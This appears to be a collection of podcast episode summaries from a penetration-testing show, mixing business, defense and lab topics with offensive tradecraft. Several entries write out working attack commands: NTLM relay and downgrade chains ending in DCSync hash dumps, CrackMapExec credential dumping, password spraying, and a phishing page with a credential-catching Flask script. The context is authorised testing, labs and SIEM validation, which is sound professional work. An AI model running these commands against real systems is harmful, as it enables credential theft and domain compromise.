Hey friends, today is a first impressions episode about Sysreptor, which according to their GitHub page, is a fully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike.  It is easy to stand up with Docker, has built-in MFA and a great hybrid WYSIWYG/code editor.  The only scary part?  There is no export to Word (insert suspenseful music here!) - your reports just go right to PDF, friends!  The killer feature for us, though, is the ability to create reports from the command line and send files, notes and findings to Sysreptor automagically!

Hey friends, today our pal Hackernovice joins us for a tool (actually two tools!) release party: EvilFortiAuthenticator - it's like a regular FortiAuthenticator, but evil.  This tool allows you to capture the FortiAuthenticator API and subsequently steal the entire device's config, subsequently allowing you to restore the config to a second server and potentially steal cleartext Active Directory creds and SMTP accounts!  We talk about BulletsPassView - a tool that originially allowed us to simply unmask the "hidden" API key in the FortiAuthenticator client (this did NOT work in the latest version of FAC). Once you get the API key, check out Fortinet's documentation to do fun things like dump the whole config to a file on disk! After you steal the config and restore it to a fresh FortiAuthenticator, use maintenance mode to reset the admin password. Once you can adjust the restored config to your liking, try using MITMsmtp to capture email server creds in the clear! TCMLobbyBBQ - this tool has nothing to do with security, but helps PC players of the Texas Chain Saw Massacre get into lobbies more efficiently.

Today we talk about some business-y things like: A pre first impressions opinion on Sysreptor Why I'm not worried about AI replacing manual pentesting (yet) My struggle with going "full CEO" vs. staying in the weeds and working on hands-on security projects

Today our pals Bjorn Kimminich from OWASP and Paul from Project7 and TheUnstoppables.ai join us as we kick off a series all about hacking the OWASP Juice Shop, which is "probably the most modern and sophisticated insecure web application!" We got a few wins on the Juice Shop score board today: Found the score board Bullied the chatbot Fired a DOM XSS Located a confidential document Gave the Juice Shop a devastating zero stars review Fired a DOM XSS which played the OWASP Juice Shop Jingle

Today our friend Amanda Berlin, Lead Incident Detection Engineer at Blumira, joins us to talk about being more mentally healthy in 2024! P.S. - did you miss Amanda's past visits to the program? Then check out episode 518, 536 and 588. Be sure to check out the next edition of Amanda's Defensive Security Handbook when it comes out in later January, 2024!

Today we tease two upcoming tool releases (shooting for Q1, 2024): TCMLobbyBBQ - a Python script for PC players of The Texas Chain Saw Massacre game to help players get out of lobbies and into live games ASAP! The script uses PyAutoGUI to take screenshots of what part of the game you're in, then make appropriate key presses and mouse clicks to get into lobby queues, then alert you when the game actually starts! EvilFortiAuthenticator - this tool will allow you to steal administrator API tokens from FortiAuthenticator which can lead to full compromise of the physical device. Happy new year!

Today I look at potentially replacing Splashtop and UptimeRobot (check out our episode about it here) with Tailscale and Uptime Kuma. The missing link (which I'd love some help with) is answering this security question: how can I setup Tailscale so that my 7MinSec testing box can connect to all these NUCs spread around the globe, but those NUCs cannot connect to each other (in case one is compromised)? Got some ideas? Let me know please!

Today we're talkin' business! Specifically: How to (gently) say "no" to (some) client projects How to (politely) challenge end-of-year deadlines An idea I'm kicking around in the lab - where I might do away with UptimeRobot and Splashtop in favor of Tailscale and Uptime Kuma

Today our pal Nate Schmitt (you may remember him from his excellent Dealing with Rejection: A DMARC Discussion Webinar) joins us to talk about breaking up with Active Directory. He covers: Why would you want to consider removing AD from your environment? What are common items to plan for? What steps should you take to efficiently plan a migration? What common challenges or considerations will you face?

Hey friends, today I share my experience working with ChatGPT, Ollama.ai, PentestGPT and privateGPT to help me pentest Active Directory, as well as a machine called Pilgrimage from HackTheBox. Will AI replace pentesters as we know them today? In my humble opinion: not quite yet. Check out today's episode to hear more, and please join me on Wednesday, December 6 for my Webinar on this topic with Netwrix called Hack the Hackers: Exploring ChatGPT and PentestGPT in Penetration Testing!

Today we talk about our first experience working through the responsible disclosure process after finding vulnerabilities in a security product. We cannot share a whole lot of details as of right now, but wanted to give you some insight into the testing/reporting process thus far, which includes the use of: BulletsPassView MITMsmtp mitmproxy

Today our good buddy Paul and I keep trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2 and 3). In today's final chapter, Paul and I: Find Eric's secret SSH back door Locate and decrypt a hidden file with Billy's homework Build wordlists with cewl Save Billy from the evil clutches of Eric Gordon!!!

Today we had a blast talking with Robert McCurdy about JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy)! JAMBOREE allows you to quickly spin up a portable Git/Python/Java environment and much more! From a pentesting POV, you can whip up an Android pentesting environment, BloodHound/SharpHound combo, Burp Suite...the list goes on!

After about a year break (last edition of this series was in October, 2022, we're back with an updated episode of How to Succeed in Business Without Really Crying. We cover: Why we're not planning on selling the business any time soon Fast Google Dorks Scan Using ProtonVPN via command line Our pre first impressions of a pentesting SaaS tool you've almost definitely heard of    

Today we're joined by Matt Warner of Blumira (remember him from episodes #551 and #529 and #507?) to talk about choosing the right XDR strategy! There's a lot to unpack here. Are EDR, MDR and XDR related? Can you get them all from one vendor - and should you? Do you run them on-prem, in the cloud, or both? Join us as Matt answers these questions and more!

Today we're talking about how you can use PatchMyPc to keep your home PC and/or pentest dropbox automatically updated with the latest/greatest patches!

Hey friends, today my Paul and I kept trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2). In our journey we learned some good stuff: Port knocking is awesome using utilities like knock: /opt/knock/knock 10.0.7.124 1466 67 1469 1514 1981 1986 Sending emails via command line is made (fairly) easy with swaks: swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.110.105:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player" You could also use telnet and do this command by command - see this article from Black Hills Information Security for more info. Hyda works good for spraying FTP creds: hydra -l user -P passlist.txt ftp://192.168.0.1 Check out my quick cheat sheet about bettercap (see episode #522) for some syntax on extracting WPA handshake data from cap files: # ...it looks like the new standard hash type might be m22000 per this article (https://hashcat.net/forum/thread-10253.html). In that case, here's what I did on the pcap itself to get it ready for hashcat: sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap # Then crack with hashcat! sudo /path/to/hashcat -m22000 readytocrack.hc2000 wordlist.txt

Today we're talking about 7 steps you can take to (hopefully) reclaim a hacked Facebook account. The key steps are: Ask Facebook for help (good luck with that) Put out an SOS on your socials Flag down the FBI Call the cops! Grumble to your attorney general Have patience Lock it down (once you get the account back)! Also, I have to say that this article was a fantastic resource in helping me create the outline above.

Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi, and a boatload of cloud-cracking power on the cheap from vast.ai. Here's my chicken scratch notes for how to take the downgraded authentication hash capture (using Responder.py -I eth0 --lm) and eventually tweeze out the NTLM hash of the domain controller (see https://7ms.us for full show notes). 

Today my Paul and I continued hacking Billy Madison (see part one here) and learned some interesting things: You can fuzz a URL with a specific file type using a format like this: wfuzz -c -z file,/root/Desktop/wordlist.txt --hc 404 http://x.x.x.x/FUZZ.cap To rip .cap files apart and make them "pretty" you can use tpick: tcpick -C -yP -r tcp_dump.pcap Or tcpflow: apt install tcpflow tcpflow -r To do port knocking, you can use the knock utility: sudo git clone https://github.com/grongor/knock /opt/knock knock 1.2.3.4 21 23 25 69 444 7777777    

In today's tale of pentest pwnage we talk about: The importance of local admin and how access to even one server might mean instant, full control over their backup or virtualization infrastructure Copying files via WinRM when copying over SMB is blocked: $sess = New-PSSession -Computername SERVER-I-HAVE-LOCAL-ADMIN-ACCESS-ON -Credential * ...then provide your creds...and then: copy-item c:\superimportantfile.doc -destination c:\my-local-hard-drive\superimportantfile.doc -fromsession $sess If you come across PowerShell code that crafts a secure string credential, you may able to decrypt the password variable with: [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MyVarIWantToDecryptGoesHere))  

Today Amanda Berlin from Blumira teaches us how to unlock the power of Sysmon so we can gain insight into the good, bad and ugly things happening on our corporate endpoints!  Key takeaways: Sysmon turns your windows logging up to 11, and pairs well with a config file like this one or this one. Careful if you are are running sysmon on non-SSD drives - the intense number of writes might bring that disk to its knees. Just getting started logging all the things with sysmon?  Why not pump those logs into a free logging/alerting system like Wazuh? I think it was SolarWinds log collector I was trying to think of while recording the show, not CloudTrail.

Today my pal Paul from Project7 and I hack the heck out of Billy Madison a vulnerable virtual machine that is celebrating its 7th anniversary this month!

Today, sadly, might be the last episode of DIY pentest dropbox tips for a while because I found (well, ChatGPT did actually) the missing link to 100% automate a Kali Linux install! Check episode #449 for more info on building your Kali preseed file, but essentially the last line in my file runs a kali.sh script to download/install all the pentest tools I want. The "missing link" part is I figured out how to get Kali to reboot and then run a script one time to complete all the post-install stuff. So at the bottom of my kali.sh is this: sudo wget https://somesite/kali-docker.sh -O /opt/kali-docker.sh sudo chmod +x /opt/kali-docker.sh sudo touch /flag sudo wget https://somesite/docker.service -O /etc/systemd/system/mydocker.service sudo systemctl daemon-reload sudo systemctl enable mydocker.service The contents of docker.service are: [Unit] Description=Docker install [Service] Type=simple ExecStart=/opt/kali-docker.sh [Install] WantedBy=multi-user.target The beginning and end snippets of kali-docker.sh are: #!/bin/bash flag_file="/flag" if [ -e "$flag_file" ]; then # get bbot sudo docker run -it blacklanternsecurity/bbot:stable --help # Do a bunch of other install things... rm "$flag_file" else echo "Script already ran before. Exiting" fi So essentially the work flow is: kali.sh runs, downloads and installs kali-docker.sh, and also installs a service that runs kali-docker.sh on each reboot. But when kali-docker.sh runs, it checks for the presence of a file called /flag. If /flag exists, all the post-install commands will run. If it does not exist, those commands won't run. Simple, yet genius I think!

Hey friends, today I'm super excited to share I found the missing link! Specifically, the missing piece that now allows me to create fully automated Windows 10 installs that serve as virtual pentest jumpboxes. Here are the high points: When your deployment script is finishing and you need the system to reboot and run some final commands, temporarily add your account as an auto-login account like so: new-itemproperty -path 'hklm:\software\microsoft\windows nt\currentversion\winlogon' -name AutoAdminLogon -value 1 -force new-itemproperty -path 'hklm:\software\microsoft\windows nt\currentversion\winlogon' -name DefaultUserName -value "your-local-user" -force new-itemproperty -path 'hklm:\software\microsoft\windows nt\currentversion\winlogon' -name DefaultPassword -value "your-password" -force Then tell Windows to run your final script one time after automatically logging in as your-local-user: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v MyRunOnceKey /t REG_SZ /d "c:\your-final-script.bat" Finally, make sure your your-final-script.bat deletes the auto-login creds: reg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\Winlogon" /v DefaultUserName /f reg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\Winlogon" /v DefaultPassword /f reg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\Winlogon" /v AutoAdminLogon /f    

In today's tale of pwnage, we'll talk about how domain trusts can be dangerous because they have...well...trust issues.

Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu: sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -y Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile: domain.com Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal: Your rad awesome eyeball cool phishing portal! body { background-image: url("https://tangent.town/static/background.jpg"); background-repeat:no-repeat; background-size:cover; } User Name: Password: Unauthorized use is prohibited! This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher: from flask import Flask, request app = Flask(__name__) @app.route('/capture', methods=['POST']) def capture(): print(request.form) return 'OK', 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000) If you don't have Flask installed, do this: sudo apt install python3-pip -y sudo pip install Flask Run this file in one session, then in your index.html file make a small tweak in the form action directive: Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!

Today we had a blast playing with Wazuh as a SIEM you can use for work and/or home. Inspiration for this episode came from Network Chuck. This one-liner will literally get Wazuh installed in about 5 minutes: curl -sO https://packages.wazuh.com/4.4/wazuh-install.sh && sudo bash ./wazuh-install.sh -a P.S. if you accidentally close your command window before writing down the admin password (like I did), you can use this command to retrieve it: sudo tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt Once Wazuh is installed, I recommend going to Management > Configuration > Edit Configuration, look for a section that starts with  and change no to yes. Also, before you start deploying agents, I recommend making some groups for them, which I believe has to be done at the command line: /var/ossec/bin/agent_groups -a -g windows-boxes -q /var/ossec/bin/agent_groups -a -g linux -q From there you should be ready to start rockin' some agent installs. Have fun!

Oooo, giggidy! Today's tale of pentest pwnage is about pwning vCenter with CVE-2021-44228 - a vulnerability that lets us bypass authentication entirely and do/take what we want from vCenter! Key links to make the magic happen: How to exploit log4j manually in vCenter How to automate the attack! Tool to steal the SAML database you extract from vCenter

Today me and my pal Paul from Project7 did a live hacking session and finally got the Callahan Auto brake pad Web app back online! Hopefully you enjoyed this hacking series. The feedback has been great, so we may have to take a crack at Billy in the near future as well.

Hey friends, today we're continuing our series on pwning the Tommy Boy VM on VulnHub VM! P.S. did you miss part one? Check it out on YouTube. Joe "The Machine" Skeen and I had a blast poking and prodding at the VM in hopes to fix the broken Callahan Auto brake-ordering Web app. Some tips/tricks we cover: It's always a good idea to look at a site's robots.txt file crunch is awesome for making wordlists fcrackzip is rad for cracking encrypted zip files dirbuster works well for busting into hidden files and subfolders exiftool works well to pull metadata out of images

Today I'm excited to share a featured interview with our new friend Mike Toole of Blumira. We talk about all things EDR, including: How does it differ from something like Windows Defender? What things do I need to keep in mind if I'm in the market for an EDR purchase? Is Mac EDR any good? How do attackers bypass EDR? Will AI create industructible malware, take over the human race and then use our bodies for batteries?

Holy schnikes - this episode is actually 7 minutes long! What a concept! Anyway, today I give you a couple tips that have helped me pwn some internal networks the last few weeks, including: Getting a second (and third?) opinion on Active Directory Certificate Services vulnerabilities! Analyzing the root domain object in BloodHound to find some misconfigs that might equal instant domain admin access!    

Hey friends! Today we're taking a second look at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! The tools covered today include: PHP-HTTP-TARPIT A tool to confuse and waste bot/scanner/hacker time. Grab it here and check out our setup instructions: sudo git clone https://github.com/msigley/PHP-HTTP-Tarpit.git /opt/tarpit cd /opt/tarpit sudo mv la_brea.php /var/www/html/index.php cd /var/www/html/ # Delete the default HTMLM files that are there sudo rm DEFAULT .HTML FILES # Start/restart apache2 sudo service apache2 stop sudo service apache2 start # It's easier to see PHP-HTTP-TARPIT in action from command line: curl -i http://IP.RUNNING.THE.TARPIT Spidertrap This tool tangles Web visitors in a never-ending maze of pages with links! sudo git clone https://github.com/adhdproject/spidertrap.git /opt/spidertrap cd /opt/spidertrap # Open spidertrap.py and change listening port from 8080 to 80 sudo nano spidertrap.py # Run the trap sudo python3 spidertrap.py Weblabyrinth This tool presents visitors with a blurb of text from Alice in Wonderland. That text has links that takes them to...you guessed it...more Alice in Wonderland excerpts! I especially like that if you visit ANY folder or link inside Weblabyrinth, content is served (return code 200 for anything and everything). I had problems getting this running on a fresh Kali box so it's probably better to run right off the ADHD distro using their instructions.

Hey friends! Today we're looking at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! ADHD gets you up and running with these tools quickly, but the distro hasn't been updated in a while, so I switched to a vanilla Kali system and setup a cowrie SSH honeypot as follows (see 7ms.us for full list of commands).

Today we're talking about reducing anxiety by hacking your mental health with these tips: Using personal automation to text people important reminders Using Remind to create a personal communication "class" with your family members Using Smartsheet (not a sponsor) to create daily email "blasts" to yourself about all the various project todos you need to tackle

Today we look at LDAP Firewall - a cool (and free!) way to defend your domain controllers against SharpHound enumeration, LAPS password enumeration, and the noPac attack.

Hey friends! This week I spoke at the Secure360 conference in Minnesota on Simple Ways to Test Your SIEM. This is something I covered a while back on the podcast, but punched up the content a bit and built a refreshed a two-part GitHub gist that covers: Questions you can ask a prospective SIEM/SOC solution to figure out which one is the right fit for you All the tools/tips/scripts/etc. you need to run through 7 (and more!) simple ways to test your SIEM!

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! In today's episode we staged an NTLM relay attack using a vulnerable SQL server. First we used CrackMapExec (see our two part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts with SMB signing disabled: cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt Then we setup lsarelayx in one window: lsarelayx --host=localhost And in a second window we ran ntlmrelayx.py: python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM Finally, in a third window we triggered authentication from the vulnerable SQL server: Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS Boom! Watch the local usernames and hashes fall out of the victim system. We also tried doing a multirelay scenario where we had a list of victim hosts in a targets.txt file like this: victim1 victim2 victim3 Then we tweaked the ntlmrelayx command slightly: python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt Interestingly(?) only victim2 was attacked. Lastly, we ran the same attack but added the -socks option to establish SOCKS connections upon successful relay: python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks Interestingly(?) we got a low-priv user to relay and setup a SOCKS connection, but not the domain admin configured on the SQL server. TLDR/TLDL: relaying credentials to a single victim with ntlmrelay on a Windows hosts seems to work great! Your milage may vary if you try to pull off more advanced tricks with ntlmrelay.

Today we're excited to share a featured interview with our new friend Jim Simpson, CEO of Blumira. Jim was in security before it was hip/cool/lucrative, working with a number of startups as well as some big names like Duo. Blumira and 7 Minute Security have a shared love for helping SMBs be more secure, so it was great to chat with Jim about the IT/security challenges faced by SMBs, and what we can do make security more simple and accessible for them.

Hey friends, today we're playing with the new (April 2023) version of Local Administrator Password Solution (LAPS). Now it's baked right into PowerShell and the AD Users and Tools console. It's awesome, it's a necessary blue team control for any size company, and you should basically stop reading this and install LAPS now.

Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode: Download SQL Server here Install SQL via config .ini file Or, install SQL via pure command line Deploy SQL with a service account while also starting TCP/IP and named pipes automagically: setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1 /SQLSVCACCOUNT="YOURDOMAIN\YOUR-SERVICE-ACCOUNT" /SQLSVCPASSWORD="YOUR PASSWORD" /SQLSYSADMINACCOUNTS="YOURDOMAIN\administrator" "YOURDOMAIN\domain users" Run PowerUpSQL to find vulnerable SQL servers: $Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"} Audit the discovered SQL servers: Get-SQLInstanceDomain -verbose | invoke-sqlaudit -verbose Fire off stored procedures to catch hashes! Invoke-SQLUncPathInjection -verbose -captureIP IP.OF-YOUR.KALI.BOX

Ok, I know we say this every time, but it is true this time yet again: this is our favorite tale of pentest pwnage. It involves a path to DA we've never tried before, and introduced us to a new trick that one of our favorite old tools can do!

Hey friends, today we talk through how to simulate ransomware (in a test environment!) using Infection Monkey. It's a cool way to show your team and execs just how quick and deadly an infection can be to your business. You can feed the monkey a list of usernames and passwords/hashes to use for lateral movement, test network segmentation, set a UNC path of files to actually encrypt (careful - run in a test lab - NOT in prod!) and more!

Today we offer you some first impressions of OVHcloud and how we're seriously considering moving our Light Pentest LITE training class to it! TLDR: It runs on vCenter, my first and only virtualization love! Unlimited VM "powered on" time and unlimited bandwidth Intergration with PowerShell so you can run a single script to "heal" your environment to a gold image Easy integration with pfSense to be able to manage the firewall and internal/external IPs Price comparable to what we're paying now in Azure land

Hey friends, today we're covering part 2 of our series all about cracking and mapping and execing with CrackMapExec. Specifically we cover: # Enumerate where your user has local admin rights: cme smb x.x.x.x/24 -u user -p password # Set wdigest flag: cme smb x.x.x.x -u user -p password -M wdigest -o ACTION=enable # Dump AD creds: cme smb IP.OF.DOMAIN.CONTROLLER -u user -p password --ntds --enabled # Clean up AD dump output: cat /path/to/file.ntds | grep -iv disabled | cut -d ':' -f1,4 | grep -v '\$' | sort # Check ms-ds-machineaccountquota: cme ldap x.x.x.x -u user -p password -M maq # Check for Active Directory Certificate Services: cme ldap x.x.x.x -u user -p password -M adcs # Pull all AD user descriptions: cme ldap x.x.x.x -u user -p password -M get-desc-users # Pull all AD user descriptions down to a file and search for users with "pass" in description: cme ldap x.x.x.x -u user -p password -M user-desc # CrackMapExec database (CME) ## Clear database sudo rm -r ~/.cme ## Handy commands inside the cmedb prompt: hosts shares creds export shares detailed shares.csv export creds detailed creds.txt

Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically: # General enumeration to see if your account works, and where: cme smb x.x.x.x -u username -p pass # Check if print services are enabled: cme smb x.x.x.x -u username -p pass -M spooler # Check for the nopac vuln: cme smb x.x.x.x -u username -p pass -M nopac # Find GP passwords: cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password # Get list of targets with smb signing: cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt # Set wdigest flag: cme smb x.x.x.x -u username -p pass -M widgest -o ACTION=enable # Dump creds/hashes: cme smb x.x.x.x -u username -p pass -M lsassy # Do pass the hash attacks cme smb x.x.x.x -u username -H HASH # Dump SAM database: cme smb x.x.x.x -u username -p pass --sam # Enumerate SMB shares cme smb x.x.x.x -u username -p pass --shares # Conduct slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 # Cleanup from slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7

Today I sat down with Chris Furner of Blumira to talk about all things cyber insurance. Many of 7MinSec's clients are renewing their policies this time of year, and many are looking into policies for the first time. Naturally, there are a ton of questions to ask and things to think about to make good coverage decisions for your business: How do I get started in looking for a cyber policy - with my general liability insurer? Or are there companies that specialize just in cyber insurance? How do I make sure I have the appropriate levels of coverage? What are basic things I can do from a security standpoint that pretty much any insurer is going to expect me to do? Enjoy the interview, where we cover these questions - and more! And be sure to also check out Blumira's whitepaper on this topic called The State of Cyber Insurance.

Hey friends, I took a mental health break this week and pre-podcasted this episode of a new series called 7MOOCH: 7 Minutes of Only Chuckles. In today's story, we unpack a situation in Hawaii that made me exclaim the following quite loudly: "Dolphin rides are done, dude!"

Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood): Change the Responder.conf file like so: ; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788 Run Responder with --disable-ess flag sudo python3 /opt/responder/Responder.py -I eth0 --disable-ess Use printerbug to coax authentication from a domain controller: sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/someuser@IP.OF.DOMAIN.CONTROLLER IP.OF.ATTACKING.BOX Convert hash to make it easier to crack! sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER Take the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds! Now you can do a Rubeus asktgt with the DC hash: rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrap Now pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!! rubeus.exe ptt /ticket:TICKET GOES HERE Use mimikatz to dump all hashes! mimikatz.exe privilege::debug log hashes.txt lsadump::dcsync /domain:yourdomain.com /all /csv

Today we continue part 2 of a series we started a few weeks ago all about building a vulnerable pentesting lab. Check out the video above, and here are the main snippets of code and tips to get you going: Use Youzer to import a bunch of bogus users into your Active Directory: sudo python ./youzer.py --generate --generate_length 20 --ou "ou=Contractors,dc=brifly,dc=us" --domain brifly.us --users 1000 --output lusers.csv Make a Kerberoastable user: New-AdUser -Name "Kerba Roastable" -GivenName "Kerba" -Surname "Roastable" -SamAccountName Kerba -Description "ROASTED!" -Path "OU=Contractors,DC=brifly,DC=us" -AccountPassword (ConvertTo-SecureString "Password1" -AsPlainText -force) -passThru -PasswordNeverExpires $true enable-adaccount Kerba setspn -a IIS_SITE/brifly-dc01.brily.us:77777 briflyus\kerba

Today we're talking about Teleseer, which is an awesome service to give you better network visibility - whether you're on the blue, red or purple team! It all starts with a simple packet capture, and ends with gorgeous visuals and insight into what the heck is on your network and - from a pentester's perspective - delicious vulnerabilities that may lie within!

Today's episode is brought to us by our friends at Blumira! Today we kick off a series all about building your own vulnerable pentest lab from scratch, specifically: Spinning up a domain controller with a few lines of PowerShell Installing Active Directory Domain Services Setting up an intentionally cruddy password policy Baking in the MS14-025 vulnerability P.S. if you're looking for a more automated/push-button solution to get up and going with a lab to play in, check out some of these options: https://github.com/Orange-Cyberdefense/GOAD https://automatedlab.org/en/latest/ https://github.com/microsoft/MSLab https://github.com/davidprowe/BadBlood https://github.com/cliffe/secgen https://github.com/WazeHell/vulnerable-AD    

Today we're releasing version 1.1 of our Light Pentest eBook. Changes discussed in today's episode (and shown live in the accompanying YouTube video) include: Some typos and bug fixes A new section on finding systems with unconstrained delegation and exploiting them A new section on finding easily pwnable passwords via password spraying A new section relaying credentials with MITM6 (be careful using some of its options - read this New ways (and some words of warning) to dump hashes from Active Directory

Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more context, but here are the essential tools and commands covered: Port scanning nmap 10.0.7.0/24 - basic nmap scan massscan -p1-65535,U:1-65535 --rate=1000 10.0.7.0/24 -v - scan all 65k+ TCP and UDP ports! Password spraying Rubeus.exe spray /password:Winter2022! /outfile:pwned.txt - try to log into all AD accounts one time with Winter2022! as the password, and save any pwned creds to pwned.txt Kerberoasting and ASREPRoasting rubeus.exe kerberoast /simple rubeus asreproast /nowrap Key group membership changes net group "GROUP NAME" user-to-add-to-a-group /add Dump Active Directory hashes cme smb IP.OF.THE.DOMAINCONTROLLER -u user -p password --ntds --enabled ntdsutil "ac i ntds" "ifm" "create full c:\dc-backup" q q SMB share hunting Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\output - SMB enumeration using PowerHuntShares

Hey friends, today's episode is hosted by an AI from Murf.ai because I suffered a throat injury over the holidays and spent Christmas morning in the emergency room! TLDL: I'm fine, but if you want the (sort of) gory details and an update on my condition after my ENT appointment, check out today's episode. Otherwise, we'll see you next week when our regularly scheduled security content continues in 2023. Merry belated Christmas, happy holidays and happiest of new year to you and yours!

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today's tale of pentest pwnage covers some of the following attacks/tools: Teleseer for packet capture visualizations on steroids! Copernic Desktop Search Running Responder as Responder.py -I eth0 -A will analyze traffic but not poison it I like to run mitm6 in one window with mitm6.py -i eth0 -d mydomain.com --no-ra --ignore-nofqdn and then in another window I do ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.the.dc -smb2support --delegate-access > relaysRphun.log - that way I always have a log of everything happening during the mitm6 attack Vast.ai looks to be a cost-effective way to crack hashes in the cloud (haven't tested it myself yet)

Today we welcome our pal Matthew Warner (CTO and co-founder of Blumira) back to the show for a third time (his first appearance was #507 and second was #529). I complained to Matt about how so many SIEM/SOC solutions don't catch early warning signs of evil things lurking in customer networks. Specifically, I whined about 7 specific, oft-missed attacks like port scanning, Kerberoasting, ASREPRoasting, password spraying and more. (Shameless self-promotion opportunity: I will be discussing these attacks on an upcoming livestream on December 29). Matt dives into each of these attacks and shares some fantastic insights into what they look like from a defensive perspective, and also offers practical strategies and tools for detecting them! Note: during the discussion, Matt points out a lot of important Active Directory groups to keep an eye on from a membership point of view. Those groups include: ASAAdmins Account Operators Administrators Administrators Backup Operators Cert Publishers Certificate Service DCOM DHCP Administrators Debugger Users DnsAdmins Domain Admins Enterprise Admins Enterprise Admins Event Log Readers ExchangeAdmins Group Policy Creator Owners Hyper-V Administrators IIS_IUSRS IT Compliance and Security Admins Incoming Forest Trust Builders MacAdmins Network Configuration Operators Schema Admins Server Operators ServerAdmins SourceFireAdmins WinRMRemoteWMIUsers WorkstationAdmins vCenterAdmins

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Hey friends, today's episode is extra special because it's our first episode we've ever done live and with video(!). Will we do it again? Who knows. But anyway, we had a fun time talking about things that have gone not so well during pentesting lately, specifically: Things we keep getting caught doing (and some potential ways to not get caught! Responder SharpHound CrackMapExec - specifically running -x or -X to enumerate systems PowerHuntShares "FUD sprinklers" - people who cast fear, uncertainty and doubt on your pentest findings A story about the time I took down a domain controller (yikes)

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Today my friends Christopher Fielder and Daniel Thanos from Arctic Wolf chat with me about what kinds of icky things bad guys/gals are doing to our networks, and how we can arm ourselves with actioanble threat intelligence and do something about it! P.S. This is Christopher's seventh time on the program. Be sure to check out his first, second, third, fourth, fifth and sixth interviews with 7MS.

